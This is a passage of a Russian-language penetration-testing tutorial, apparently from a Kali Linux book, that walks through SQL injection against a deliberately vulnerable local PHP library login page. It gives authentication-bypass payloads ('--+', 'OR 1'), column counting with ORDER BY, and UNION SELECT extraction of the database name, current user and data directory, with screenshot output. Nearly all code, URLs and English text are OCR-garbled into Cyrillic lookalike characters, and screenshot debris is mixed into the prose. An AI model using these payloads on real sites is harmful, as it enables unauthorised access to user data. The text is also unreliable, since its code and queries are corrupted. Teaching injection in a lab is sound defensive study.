
} 

361 

} еізе { 

371 

ргіпРР("Ошибка: %5\п", $тузрІІ->еггог); 

381 

} 

391 

$ту$рІІ->сІ05е(); 

401 

?> 

411 

с/ЬосІу> 

421 

с/ЫтІ> 


Вы намного больше поймёте, если будете всё делать вместе со мной. Поэтому вот 


ссылка на архив . В нём два файла: іпсІех.рИр и с!Ь_ІіЬгагу.$дІ. Файл іпФех.рЬр 
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разместите в любое место на сервере — это и есть наш уязвимый скрипт. А файл 
сіЬ_1і Ьгагу.здI нужно импортировать, например, при помощи рбрМуАсІтіп. 


В файл іпбех.рНр в качестве имени пользователя базы данных задан гооТ, а пароль — 
пустой. Вы можете вписать свои данные, отредактировав строчку: 


1 


$ту$дІІ = пеѵѵ тузрІіС'ІосаІІіозІ:", "гооГ,"", "сіЬ_ІіЬгагу"); 


По легенде, это форма входа в он-лайн версию Бобруйской районной библиотеки. Нам 
уже дали учётные данные: имя пользователя — Рето, пароль — 111. 


Файл Правка Вид Журнал Закладки Инструменты Справка 
^^НМрі//ІосаІИоГ1іаЬ1/іпгі©срИ^>^1 + 


ІосаІЬойТей/туздІ-іп^ІаЬІ./іпсіех.рЬр 


П РиЫіса(іоп$ аѵаіІаЫе:... 

ІІМТ ѵ « «в* ЗСЛ' Х55’ Епсгурбоп* Епсосйпд’ ОіЬег' 

ОУ 1_оас1 ІЖІ. 

Ж зрілиш 

► ЕхесіЛе 


□ ЕпаЫе Рой сіаіа □ ЕпаЫе Ке^еггег 

ф 0І5аЫе» ^ Соокіеі- / С55» Ц Роггт» Ш Ітаде*» ІпРогтабоп» |§| Мі$сеІІапеои5* ^ Оиіііпе* ^ Кв5Іге* X ТоОІ5» II 


|| Ѵіеѵѵ Боигсе* ^ Орбоп5* 


Для доступа к Бобруйской районной библиотеке введите Вашн учётные данные: 

Введите ваше имя 


Введите ваш паратъ 


Отправить запрос 


Давайте введём их и посмотрим: 

Файл Правка Вид Журнал Закладки Инструменты Справка 
^^іК|1//ІосаІНо!!!&ра55мюгс1^^^^^^ + 


<■ Ф ІосаІНоЛ/*е5І/ту5ЦІ-іп]-!аЫ/іпсІех.рНр?пате=0ето&рз55ѵѵогс1=111 


М РиЫісабопБ аѵаіІаЫе: ... 

/ <= $ 501.- Х5Б-* Епсгурйоп- ЕпсоЫпд- 0*Иег’ 


ІМТ 


іоасі ііт. 
1 ЗрІІПЖІ 
► ЕхесіЛе 


Нйр://ІосаІНойЛей/ту5дІ-іп]-ІаЬ1/іпс1ех.рНр?пате= 0ето&ра55ѵѵогсЬ 111| 


П ЕпаЫе Рой гіаіа Ц ЕпаЫе КеРеггег 

ф 0І5аЫе' ^ Соокіе5’ / СББ^ и Рогт$* Ші Ітаде5- в ІпРогтабоп- § Мі$сеІІапеои5^ / ОиТІіпе' ^ І^ге- ^ ТооІ5' Щ ѴіеѵѵБоигсе» ОрІіоп5" 


Для доступа к Бобруйской районной библиотеке введите Вашн учётные данные: 

Введите ваше имя 


Введите ваш пароль 

Отправить запрос 
Ваше имя: Вето 
Ваш статус: изег 
Доступные для Вас книги: 

• Журнал Мурзилка (по дши вка за 1986-1989 гт.) 

• Вл. Ленин. Мир, труд, май! 

• С.Минаев. Духіезз 


Наши учётные данные приняты, на экраны выведено наше имя, статус и доступные для 
нас книги. Можете попробовать, с любыми другими данными (если поменять имя или 
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пароль) мы не сможем войти и посмотреть доступные для чтения книги. Также мы не 
можем узнать, какие книги доступны для остальных, поскольку мы не знаем их имени 
и пароля. 


Подсмотрим в исходный код, чтобы понять, как произошёл запрос к базе данных: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '$пате' АИЭ раззѵѵогсі ='$ра55ѵѵогсГ 


Слово 5ЕІ.ЕСТ в 5Щ-запросе показывает, какие данные нужно получить. Например, 
можно было бы указать 5ЕІ.ЕСТ пате, или 5ЕІ.ЕСТ пате, раззѵѵогсі. Тогда в первом бы 
случае из таблицы было бы получено только имя, а во втором — только имя и пароль. 
Звёздочка говорит, что нужно получить все значения. Т.е. 5ЕІ.ЕСТ * — это означает 
получить все значения. 


РВОМ говорит откуда их нужно получить. После РВОМ следует имя таблицы, т. е. 
запись РВОМ 'тетЬегз' говорит, получить из таблицы 'тетЬегз'. 


Далее ѴѴНЕВЕ, если вы изучали какие-либо языки программирования, то это слово 
больше всего напоминает «Если». А дальше идут условия, эти условия могут быть 
истинными (1) или ложными (0). В нашем случае 

(пате = '$пате') АЫЭ (раззѵѵогсі ='$ра55\л/огсГ) 

означает, что условие будет истинным, если переданная переменная $пате будет 
равна значению поля пате в таблице и переданная переменная '$ра55\л/огсІ будет 
равна значению поля раззѵѵогсі в таблице. Если хотя бы одно условия не выполняется 
(неверное имя пользователя или пароль), то из таблицы ничего не будет взято., т. е. 
выражение 5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '$пате' АЫЭ раззѵѵогсі 
='$ра$$\л/огсГ означает: в таблице 'тетЬегз' взять значения всех полей, если для них 
выполняется условие — совпадают переданное имя пользователя и пароль с теми, 
которые встречаются в таблице. 


Это понятно. Давайте теперь, например, с именем пользователя подставим одиночную 
кавычку: 


Файл Правка Вид Жу рнал Закладки Инструменты Справка 

Л±I 


; ф ІосаІНо5І/Іей/ту5дІ-іп)-ІаЬ1/іпс1ех.рНр?пате= Рето'&ра55ѵѵогсі= 1 


И РиЫісабоп5 аѵаіІаЫе: ... 


ЮТ 


ѵ <= ф 50 І_- Х55’ Епсгурііоп’ Епсосііпд- ОіИег^ 


ОУ І-оасі 1)ВІ_ 

Ж іріііига. 

► Ехесиіе 


Н«р://ІосаІНойДей/ту5дІ-ігу-ІаЬ1/іпсІех.рНр?пате= Рето'&ра55ѵѵогсІ= 111| 


I I ЕпаЫе Рой сіаіа О ЕпаЫе Кеіеггег 

ф 0І5аЫе* ^ Соокіез» / С55* а Рогт$" |Щ Ітаде5" ІпРогтаІіоп’ § МІ5сеІІапеои$' ^ ОиИте- ^ Ве$І 2 е" ^ ТооІ5" ■ ѴіеѵѵЗоигсе» ОрІіоп$» 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш паратъ 


Отправить запрос 

Ошибка: Уои Ъаѵе ап еггог іп уоиг зупіах; сЬеск іЬе шапиаі іЬаі соггезрошіз іо уоиг МуЗДЬ зегѵег ѵегзіоп Гог іЬе п§Ъі зупіах іо иве пеаг '111" аі Ііпе 1 


Адресная строка: 

НіІр://ІосаІЬо5і/іе5і/ту5рІ-іпі-ІаЫ/іпсІех.рИр?пате=Оето І &ра55\л/огсІ=111 
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Никакие данные не получены, вместо них мы видим ошибку: 


1| 

Ошибка: Ѵои Ьаѵе ап еггог іп уоиг 501. зупРах; сЬеск РЬе тапиаі ТНаТ соггезропсіз Іо уоиг 
МуБОЬ зегѵег ѵегзіоп Тог ТНе гі§Ы: зупРах Іо изе пеаг '111" а! Ііпе 1 

При введении верных данных, наш запрос выглядел так: 

1| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето' АІ\Ю раззѵѵогсі ='111' 

При добавлении кавычки, наш запрос превращается в следующее: 

1| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето 1 ' АІ\Ю раззѵѵогсі ='111' 

Я поставил дополнительные пробелы для наглядности, т. е. у нас получается запрос: 

1| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето 1 


Кстати, запрос верный по синтаксису. И сразу после него, без каких либо разделителей 
идёт продолжение запроса: 


1 


' АІ\Ю РЭ55ѴѴОГСІ ='11Г 


Оно-то всё и ломает, поскольку количество открывающих и закрывающих кавычек не 
равно. Можно, например, подставить ещё одну кавычку: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето 1 


АИР раззѵѵогсі ='111' 


Адресная строка: 

Іі1:1:р://ІосаІІіо5І:Де5І:/ту5рІ-іпі-ІаЫ/іпсІех.рІір?пате=Оето"&ра55\л/огсІ=111 


Файл Правка Вид Журнал Закладки Инструменты Справка 

± 


Г 


Ж» ІосаІІюй/1ей/ту5дІ-іп]ДаЬ1/іпсіех.рНр?пате=0ето''8фа5^огсЬ1'І1 

П РиЫіса(іоп5 аѵаіІаЫе: ... 


ЮТ 


ѵ «= *в* БОЬ Х55» Епсгурііоп’ Епсосііпд- ОТНег- 


ОУ І_оас1 ІЖІ. 

Ж ІРІІЮМ- 

► Ехесігіе 


Нйр://ІосаІЬойЛей/ту5дІ-іпі-ІаЬ1/іпсіех.рЬр?пате=0ето ,, &ра55ѵѵоггі=111 


□ ЕпаЫе Рой сіаіа СИ ЕпаЫе Кеіеггег 


0 ОіваЫе- X Соокіев- / С55- Ц Роггш* |Щі Ітадез* ѳ ІпРогтабоп' |у| МІ5сеІІапеои5» ^ Оігіііпе- ^ Ке5І2е- ^ ТооІ5’ Ш ѴіеѵѵБоигсе^ ОрТіопх* 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 


Отправить запрос 


Ошибка исчезла, но осмысленности это в запрос не добавило. Нам мешает 
бессмысленный хвост запроса. Как бы нам от него избавиться? 

Ответ есть — это комментарии. 

Комментарии в МуБЦІ. можно задать тремя способами: 

# (решётка — работает до конца строки) 

— (два тире — работают до конца строки, нужен символ пробела после двух тире) 
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/* это комментарий */ группа из четырёх символов — всё, что внутри — это 
комментарий, всё, что до или после этой группы символов, не считается 
комментарием. 


Давайте в наш запрос с одной кавычкой, после этой кавычки поставим знак 
комментария, чтобы отбросить хвостик, и знак +, который обозначает пробел, чтобы 
запрос получился таким: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето 1 --+ ' АМР раззѵѵогс) ='111' 


Адресная строка: 


Ні:1:р://ІосаІИо5І:Де5І:/ту5рІ-іпі-ІаЫ/іпсІех.рЬр?пате=0ето І —+&ра$з\л/огсІ=111 


Ошибка не только исчезла, но и выведены корректные данные для пользователя Оеітіо. 
Поскольку теперь наш запрос приобрёл вид: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето' 


Ведь хвостик —+ ' АШ раззѵѵогс! ='111' превратился в комментарий и больше на запрос 
не влияет. 


Посмотрите ещё раз внимательно на новый запрос: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето' 


И в нём больше не проверяется пароль! Т.е. зная имена легитимных пользователей, но 
не зная их паролей, мы можем просматривать их личные данные. Т.е. мы уже начали 
эксплуатировать 5Щ-инъекцию. 


К сожалению, я не знаю ни одного легитимного имени и мне нужно придумать что-то 
другое. 


Посмотрим внимательно на эту часть запроса: 


1 


ѴѴНЕВЕ пате = 'Рето' 


Помните про АШ, которое используется в первом запросе? Оно означает логическую 
операции «И». Напомню, логическая операции «И» выдаёт «истина» (1) только если 
оба выражения являются истиной. Но логический оператор «ИЛИ» выдаёт «истина» (1) 
даже если хотя бы одно из выражений является истиной. Т.е. выражение: 


1 


ѴѴНЕВЕ пате ='Оето'ОВ 1 


Всегда будет истиной, всегда будет возвращать 1. Поскольку одно из двух 
сравниваемых выражений всегда возвращает 1. 


Т.е. нам нужно составить выражение, которое будет выгладить так: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = 'Рето' ОВ 1 


Адресная строка: 

бНрУ/ІосаІбозѴіезі/тузцІ-іпЯаЫ/іпсІех.рІірРпаіт^Оето 1 ОВ 1 —+ &раззѵѵогсІ=111 
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Результат: 


Файл Правка Вид Журнал Закладки Инструменты Справка 


ЬсаІЬойЛе^тугдІ-і^-ІаЬІ/іпгіех.рЬрТпагг^Оето' ОВ 1 --+ &ра$5ѵѵог<і= 111 

И РиЫіса*іоп5 аѵаіІаЫе: ... 

=> 5СЛ* Х55* Епсгурііоп’ Епсосііпд* ОіЬег* 


ІЫТ ѵ . 

да І_оасі ІІКІ. 

Ж 5рІІІ ОРІ 

► Ехесиіе 


ЬНр://ІосаІЬо5І/іе5І/ту5дІ-іп]-ІзЫ/іпс1ех.рЬр?пате=Оето‘ ОК1 —+ &ра55\л/огс1=П1 


□ ЕпаЫе Ро$* сіаіа □ ЕпаЫе КеГеггег 

0 ОііэЫе- X Соокіеі- / С55- Ц Ротп5" Ы Ітаде5» «(у ІпРогтаІіоп» у| МІ5сеІІапеои5' ^ ОиІІіпе* ^ Ве5Іге* ^ Тооіі* 


1 Ѵіеѵѵ Зоигсе» Орбоп$" 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 

Отправить запрос 
Ваше имя: Эето 
Ваш статус: изег 
Доступные для Вас книги: 

• Журнал Мурзилка (подшивка за 1986-1989 гт.) 

• Вл. Ленин. Мир, труд, май! 

• С.Минаев. Духіезз 


Ваше имя: ЬіЬгагіап 
Ваш стату с: асітт 
Доступные для Вас книги: 

• Кали Линукс в картинках 

• Кали Линукс для тех. у кого нет компьютера 

• Кали Линукс для тех, кому за 60 


Ваше имя: Зраішпег 
Ваш статут: изег 

Доступные для Вас книги: Для спамеров ничего нет - ненавижу г спамеров! 

Результат отличный! Мы получили список всех записей в таблице. 

ОВйЕВ ВУ и ІШІСШ — главные друзья БЦЬинъекций 

Мы уже сейчас получили данные, которые были недоступны тем, у кого нет валидных 
имени пользователя и пароля. Можно ли что-то ещё получить? Да, можно получить 
полный дамп этой таблицы (напомню, у нас по прежнему нет паролей. Более того, мы 
можем получить все данные из всех баз на этом сервере через одну крошечную 
дырочку! 

ІІІМЮІМ позволяет объединять 50.1,-запросы. В реальной жизни у меня задачи простые, 
поэтому и простые запросы к базам данных и возможностями ІІІМЮІМ я не пользуюсь. 
Но вот для 5Ц1_-инъекций ценнее этого слова нет. 

ІІІМЮІМ позволяет довольно гибко объединять 5Ц1_-запросы с 5Е1.ЕСТ, в том числе и от 
разных баз данных. Но есть важное требование к синтаксису: количество столбцов в 
первом 5Е1.ЕСТ должно равняться количеству столбцов во втором 5ЕІ.ЕСТ. 

ОРЮЕР ВУ задаёт сортировку полученных из таблицы данных. Можно задавать 
сортировку по имени столбца, а можно по его номеру. Причём, если столбца с таким 
номером нет, то будет показана ошибка: 
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Тестирование на проникновение с помощью Каіі Ріпих 2.0 


Адресная строка: 

НРРр://ІосаІІ"Ю5Р/Ре5Р/ту$рІ-іп]-ІаЬ1/іпсІех.рНр?пате=-Г ОРЮЕВ ВУ 1 —+ &ра$5\л/огсІ=111 
Запрос выглядит так: 


1 


БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '-Г ОВРЕВ ВѴ 1 


Мы заменили имя пользователя на -1 чтобы не выводились никакие данные. 


Файл Правка Вид Журнал Закладки Инструменты Справка 


Г 


И«р://ІосаІИо...&ра55ѵѵогс1= 111 


^1 


^ <->ѵ ІосаІЬо5ІТе5І/ту5дІ-іпДІаЫ/іпсіех.рНр?пате=-1' ОКОЕК ВѴ 1 --+ &ра55ѵѵогсЫ11 




п РиЫісаІіопБ аѵаіІаЫе:... 

“ Ф 5СЦ- Х55» Епсгурйоп* Епсогііпд» ОіЬег* 


ІМТ 


Іоаб ІЖІ. 


Ж арйіюі. 


Ехесігіе 


ННр://ІосаІЬо5Ѵ*е5Ѵту5дІ-іпДІаЬ1/іпгіех.рНр?пате=-1' ОКРЕК ВѴ 1 --+ &ра55ѵѵог6=111 


I I ЕпаЫе Ро$1 сіаіа Щ] ЕпаЫе Ке^еггег 

0 ОігэЫе- X Соокіе$- / С55- У Роггп5* Ш Ітаде5’ ѳ ІпРогтаІіоп-' § МІ5сеІІапеои5» ^ Оігіііпе* ^ Кезіге* ^ ТооІ5~ Я Ѵіеѵѵ Боигсе» ОрІіоп5- 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 




Отправить запрос 



Ошибки нет, также нет ошибки и при запросах: 


і| 

5ЕЕЕСТ * РВОМ ’тетЬегз' ѴѴНЕВЕ пате = '-Г ОВЭЕВ ВУ 2 

2 1 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = ’-І’ ОВОЕВ ВУ 3 

3| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = ’-І’ ОВЭЕВ ВУ 4 

4| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = ОВРЕВ ВУ 5 


А вот запрос: 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = ОВРЕВ ВѴ 6 


Ему соответствует адресная строка: 

РіРРр://ІосаІІ"Ю5Р/Ре5Р/ту5рІ-іп]-ІаЬ1/іпсІех.рІір?пате=-Г ОРЮЕВ ВУ б —+ &ра$5\л/огсІ=111 
Выдал ошибку: 


1 


Ошибка: ІІпкпоѵѵп соіитп '6' іп ’огсіег сіаизе' 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Файл Правка Вид Журнал Закладки Инструменты Справка 



^ гѵ ІосаІИо5І , Те5І/ту5ЯІ-і^-ІаЫ' , іпс1ех.рИр?пате=-Г ОКОЕК ВѴ 6 --- &ра55\л/огсі= 111 

П РиЫісаІіоп5 аѵаіІаЫе: ... 


ѵ <= # $ОЬ Х55» Епсгурйоп-* ЕпсосЛпд- ОіЬег" 


% 5ріл іжі. 

► Ехесігіе 


НКр://ІосаІНойЛей/ту5дІ-і^-ІаЬ1/іпс1ех.рНр?пате=-'Г ОКЭЕВВУ 6 —+ &раз5ѵѵогс1= 111 


П ЕпаЫе Рой сіаіа О ЕпаЫе Ве^еггег 

0 ШнЫе- X Соокік- / С5$- у Рогт5’ ;ШІ Ітаде5» ф ІпРогтаііоп' |у| МІ5сеІІапеои$’ / Оійііпе» ^ Ве5І2е" ^ ТооІБ' Ш ѴіеѵѵЗоигсе- уу Орйоп5" 


Для досту па к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш паратъ 


Отправить запрос 

Ошибка: І_ т пкпо\ѵп соіитп '6' ш ’огбег сіаизе’ 


Это означает, что из таблицы выбираются данные по пяти колонкам. 


Конструируем наш запрос с ІІІМЮІМ: 


Как я сказал, количество полей должно быть в обоих 5ЕІ.ЕСТ одинаковое, а вот что в 
этих полях — не очень важно. Можно, например, прописать просто цифры — и именно 
они и будут выведены. Можно прописать N1)11 - тогда вместо поля ничего не будет 
выведено. 


1 


5ЕІ.ЕСТ * РВОМ 'тетЬегз' ѴѴНЕКЕ пате = '-Г ІІМСШ 5ЕІ.ЕСТ 1,2,3,4,5 


Адресная строка: 


ЬНр://IосаIЬо5V1е5^/ту5^I-іп^-IаЫ/іпсIеx.рI^р?пате=-1 , ІІЫІОЫ 5Е1.ЕСТ 1,2,3,4,5 —+ 

&раз$\л/огс1=111 


Пробуем: 


Файл Правка Вид Журнал Закладки Инструменты Справка 


р^тйр!//1оса1Ио!!& 1 ра55шогй^Ш^^^^ + 


^ ф ІосаІЬоі 5 ЮейЛпуЯ|Мпі-ІаЫЛп<кх^р?ііапіе=- 1 ' СІМІОМ 5 Е 1 ЕСТ 1 , 2 , 3 , 4,5 --+ &ра 55 ѵѵогсІ =111 


П РиЫісабоп5 аѵаіІаЫе: ... 


ѵ <= ф 50 Е-г Х55’ Епсіурбоп’ Епсосііпд- ОіЬег- 


Ж 5рІй ШИ 
► ЕхесіЛе 


Нйр://ІосаІЬой/ІейЛ , пу5дІ-іп^ІаЬ1/іпсІех.рНр?пате=-1' ^NIОN 5ЕІ.ЕСТ 1ДЗД5 --+ &ра55ѵѵогсЫ11 


П ЕпаЫе Рой сіаіа П ЕпаЫе КеЕеггег 

ф 0і$аЫе* ^ Соокіев" / С55» и Рогт$» Ш Ітаде$" ^ ІпРогтабоп» у| МІ5сеІІапеои$* ^ ОиІІіпе* ^ Ке$І 2 в' ^ ТооІ$* ■ Ѵіеѵѵ5оигсе» ЦУ Орбоп$" 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 

: і 

Отправить запрос 

Ваше имя: 2 
Ваш статус: 4 

Доступные для Вас книги: 5 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Другой способ нахождения количества столбцов — с помощью того же ІЛ\ІІОІ\І. 
Лесенкой прибавляем количество столбцов: 


1| 

5ЕЕЕСТ * * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '-Г ЕІМІОМ 5ЕІ.ЕСТ 1 

21 

5ЕЕЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = ’-І’ ЕІМІОМ 5ЕЕЕСТ 1,2 

3| 

БЕРЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '-Г Е^ІОЫ БЕРЕСТ 1,2,3 

4| 

БЕЕЕСТ * РВОМ 'тетЬегз' ѴѴНЕВЕ пате = '-Г Е^ІОЫ БЕЕЕСТ 1,2,3,4 


Все они будут вызывать одну и туже ошибку: 


1 


Ошибка: ТЬе изесі БЕЕЕСТ зЕаЕетепЕз баѵе а сМегепЕ питЬег оЕ соіитпз 


Файл Правка Вид Журнал Закладки Инструменты Справка 
р^тйр!//ІосаіІто!! , & І ра553оггі^П^^^^^||^| 


^ 9 ІосаІЬо5ІДей/ту5дІ-іпі-ІаЫ/іпгіех.рНр?пате=-1' ЦЫІСМ 5Е1.ЕСТ 1,2Д4 —*■ &ра55ѵѵоггі=1 


И РиЫіса*іоп5 аѵаіІаЫе: . 


ѵ «=» ❖ 50І.’ Х55» Епсгурііоп* Епсосііпд'' ОіНег" 


да) Ьоас! ІЖІ. 

Ж ЗрІІНЖІ. 
► Ехесиіе 


Нйр://ІосаІНойДей/ту5дІ-іп^ІаЬ1/іпс1ех.рНр?пате=-'Г ІЛЧІОЫ 5ЕІ.ЕСТ 1,2,3,4 —+ &ра55іл/огсІ=111 


[~1 ЕпаЫе Рой сіаіа О ЕпаЫе КеРеггег 

ф ОІБаЫе» ^ СоокіеБ* / С55’ и Ропта» Ш Ітаде5’ ^ Іп^огтабоп" У МІ5сеІІапеои5» ^ ОіЛІіпе» ^ Ке5Іге- ^ ТооІ5- Щі Ѵіеѵѵ Боигсе» ^ Орболз- 


Для досту па к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 


Отправить запрос 

Ошибка: ТЬе изесі ЗЕЬЕСТ зШетепТз Ьаѵе а бійегепі питЬег оГ соіитпз 


Делайте так пока не исчезнет сообщение об ошибке. 

Обратите внимание, что содержимое некоторых полей ІДМІСМ 5Е1.ЕСТ 1,2,3,4,5 
выводится на экран. Вместо цифр можно задать функции. 

Что писать в 5Е1.ЕСТ 

Есть некоторые функции, которые можно писать непосредственно в ІЛМІОІМ: 

. ОАТАВА5Е() — показать имя текущей базы данных 
. СІЖКЕМТ_ІІ5ЕК() — показывает имя пользователя и имя хоста 

• @@сіа1асііг — выводит абсолютный путь до базы данных 
. ІІ5ЕК() — имя пользователя 
. ѴЕК$ІОІ\І() — версия базы данных 

В нашем примере выводятся поля 2, 4 и 5. Т.е. мы можем использовать любое из этих 
полей. 

Используем ОАТАВА5Е() в ШУИСМ 5ЕІ.ЕСТ 

Адрес: 

I^ЕЕр://IосаII^о5Е/Ее5Е/ту5^I-іп^-IаЬ1/іпсIеx.рI^р?пате=-1 , ШУМОМ 5ЕІ.ЕСТ 1,2,3,4,ОАТАВА5Е() 
—+ &ра$$\л/огс1=111 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Результат: 

Файл Правка Вид Журнал Закладки Инструменты Справка 
р^іН-рѴУ1о«ІНа^^ - 

^ ф ІосаІНоЛДе5І/ту5дІ-іп]4аЬ1лпсіех.рИр?пате=-Ѵ ЦМОЫ 5Е1.ЕСТ 1,2,3,4,ОАТАВА5Е0 &ра$5ѵѵогсЬ 111 





И РиЫіса*іоп5 аѵаіІаЫе: ... 

♦ 501- Х55' Епсгурііоп' Епсосііпд' ОіКег' 


ду 1_оасі ІЖІ. 

Ж 5 рІі» ига. 

► Ехесиіе 


ЬНр://ІосаІЬо5І/Іе5І/ту5дІ-і^-ІаЫ/іпсІех.рИр?пате=-1 І УМОМ 5ЕІ.ЕСТ 1,2,3,4,ОАТАВА5Е0 --+ &ра55ѵѵогсі=111 


I I ЕпаЫе Ро5І сіаТа О ЕпаЫе Ке^еггег 

0 йІ5аЫе' X Соокіев' / С55' и Рогт5' Ы Ітаде5' ф Іп^огтайоп' у МІ5сеІІапеои5' ^ ОиІІіпе' ^ Кехіге' ^ ТооІ5' Щ. Ѵіеѵѵ Боигсе» [Д| Ор*іоп5' 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 

Отправить запрос 
Ваше имя: 2 
Ваш статус: 4 

Доступные для Вас книги: <іЬ_1іЪгагѵ 


Используем СІІККЕМТ_ІІ5ЕК() в ІЛЧІОЫ 5ЕІ.ЕСТ 


Адрес: 

Ыір://ІосаІЬо5і/іе5і/ту5дІ-іп]-ІаЬ1/іпсІех.рІтр?пате=-1' ІЛМІОЫ 5ЕІ.ЕСТ 

1,2,3,4,СІІККЕІ\ІТ_ІІ5ЕК() -+ &ра55ѵѵогсІ=111 

Результат: 


Файл Правка Вид Журнал Закладки Инструменты Справка 




Нйр://ІосаІИо...&ра55ѵѵогс1= 111 


1 


е & ІосаІЬо5І/4е5І/ту5яМпі-ІаЫ/ігаів<.рНр?пзте=-Г МІОЫ 5ЕІ.ЕСТ 1,2,ЗДСІЖКЕМТ ІІ5ЕК0 -* вфаіэтѵогіЫІІ 

И РиЫісаІіоп5 аѵаіІаЫе:... 

ІІМТ ѵ с= ф 501' Х55' Епсгурііоп’ Епсосііпд' 0*Нег' 


оу Іоасі ІЖІ. 

Ж 5рііі ига. 

► ; Ехесігіе 


ИНр://IосаIЬо5V4е51/ту5^I-іп^-IаЫ/іпс^еx.р^1р?пате=-1 , УМОМ 5ЕІ.ЕСТ 1,2Д4,СІІККЕМТ_1)5ЕК0 &ра55ѵѵогсі=111 


I I ЕпаЫе Ро5* сіаіа О ЕпаЫе Ве^еггег 

0 0І5аЫе' X Соокіе$' / С55' а Рогпт5' ІЩі Ітаде$' ф Іп^огтаііоп' у МІ5сеІІапеои5' ^ ОіЛІіпе' ^ Ке5Іге' ^ ТооІ5' ■ Ѵіеѵѵ Боигсе» Ц^| ОрІіоп$' 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш паратъ 

Отправить запрос 
Ваше имя: 2 
Ваш статус: 4 

Доступные для Вас книги: гоо*@1оса1Ьо$г 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Используем @@сіа1асііг в ШУМОМ 5ЕІ.ЕСТ 

Адрес: 

Н1:1:р://IосаII^о51:Де51:/ту5^I-іп^-IаЫ/іпсIеx.рI^р?пате=-1 , ШУНСМ 5ЕІ.ЕСТ 1,2,3,4,@@сІа1:асІіг 
—+ &ра$$\л/огс1=111 

Результат: 


Файл Правка Вид Журнал Закладки Инструменты Справка 
^^т«рі//ІосаІИоГ&ра553ог^^^^Х 


^ & ІосаІЬо5І/Іез1/ту5рІ-і^-ІаЫ/іпс1ех.рНр?пате=-1' ІМІОЫ 5Е1.ЕСТ 1,2,3,4,@@сіа*агііг --+ &ра55ѵѵогсЫ 11 

И РиЫісабопз аѵаіІаЫе: ... 


ЮТ 


у сэ ф Х55» Епсгурбоп» ЕпсосКпд' ОіНег» 


ОУ Ьоас! ІЖІ. 

Ж 5рІ№ ЦКЬ 

► ЕхесіЛе 


НКр://ІосаІНойЛей/ту5дІ-іпДІаЬ1/іпсІех.рНр?пате=-'Г ІІМОМ 5ЕІ.ЕСТ 1,2Д4,@@сІаІасІіг|~+ &ра55ѵѵогс1=111 


О ЕпаЫе Рой сіаіа О ЕпаЫе Ке^еггег 

ф ОізаЫе» ^ Соокіе5- / С55» й Рогтш» Щ; Ітадез* ^ Іп^огтаііоп* @ МІ5сеІІапеои5’ ^ ОіЛІіпе- ^ Ке5І2е* ^ Тооіб- ■ ѴіеѵѵБоигсе» Щ Орііоп5* 


Для доступа к Бобруйской районной библиотеке введите Ваши учётные данные: 

Введите ваше имя 


Введите ваш пароль 

Отправить запрос 

Ваше имя: 2 
Ваш статус: 4 

Доступные для Вас книги: с:\$еіл ег сЫа ЛВ сІаІаѴ 


Получение имён таблицы, полей и дамп базы данных 

В базе данных іггіогтаІіоп_5сНета есть таблица, которая называется ІаЫез. В этой 
таблице содержится список всех таблиц, которые присутствуют во всех базах данных 
этого сервера. Мы можем отобрать наши таблицы, ища в поле 1аЫе_5сНета название 
нашей базы данных — 'бЬ_ИЬгагу' (имя мы узнали с помощью 0АТАВА5Е()). 


Это называется полная техника Ш\МОІ\І. Материала по ней предостаточно в Интернете. 
На моём же МуЗСН. сервере полная техника ІІИІОИ не работает. У меня появляется 
ошибка: 


1| 

Ошибка: ІІІе§аІ тіх оі" соііабопз Іог орегабоп 'ІІІ\ІІОГ\Г 

Не работает не из-за кривизны рук, поскольку у зцітар также эта техника не приносит 
результатов: 

1| 

5оте1:Ып§ ѵѵепі \л/гоп§ \л/ібі ТиІІ ШМІОМ ІесИпіцие (соиісі Ье Ьесаизе оі" Іітііабоп оп 
геігіеѵесі питЬег оі епігіез). РаІІіп§ Ьаск Іо рагбаі ІЛМІОЫ ІесНпідие 


Возможно, это связано с версией МуЗЩ. 5.6. Т.к. привести практических примеров я не 
могу, а переписывать чужие неработающие команды мне не интересно — сейчас и без 
